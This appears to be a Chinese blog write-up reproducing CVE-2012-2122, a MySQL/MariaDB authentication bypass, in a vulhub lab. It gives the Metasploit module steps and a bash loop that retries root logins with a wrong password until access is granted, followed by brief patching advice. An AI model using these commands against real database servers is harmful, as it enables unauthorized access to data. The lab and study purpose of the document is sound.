MySql身份认证绕过漏洞(CVE-2012-2122)

目录

一、MySql身份认证绕过漏洞(CVE-2012-2122)

1、漏洞简介

2、受影响的版本

二、复现环境

三、漏洞复现

1、进入vulhub-master/mysql/CVE-2012-2122目录下执行如下命令启动测试环境,查看容器启动状态

2、启动msf,查询并使用攻击模块,设置相应的配置,yes处没有的要配置上去不要空着

3、使用exploit或run命令对靶机进行攻击

四、漏洞解决办法

一、MySql身份认证绕过漏洞(CVE-2012-2122)

1、漏洞简介

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

2、受影响的版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

二、复现环境

攻击机:kali-linux-2022.2(IP:192.168.50.133/24)

靶机:Ubuntu(IP:192.168.50.189/24)

Ubuntu已安装vulhub靶场环境,由于该漏洞复现过程较容易,有些地方一笔带过,工具请去官网自行下载

三、漏洞复现

经过测试,本环境虽然运行在容器内部,但漏洞是否能够复现仍然与宿主机有一定关系

1、进入vulhub-master/mysql/CVE-2012-2122目录下执行如下命令启动测试环境,查看容器启动状态

        docker-compose up -d

        docker ps

2、启动msf,查询并使用攻击模块,设置相应的配置,yes处没有的要配置上去不要空着

        msfconsole

        search cve-2012-2122

        use 0

        set rhosts 192.168.50.189

3、使用exploit或run命令对靶机进行攻击

        run

漏洞在第三步已复现完,这是补充:在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录,大概需尝试200多次才能拿到mysql数据库的密码,具体多少次忘了,等待时间可能很长:

        for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.50.189 -P3306 ; done

四、漏洞解决办法

1、升级官方补丁

2、更新mysql

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猿猿酱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值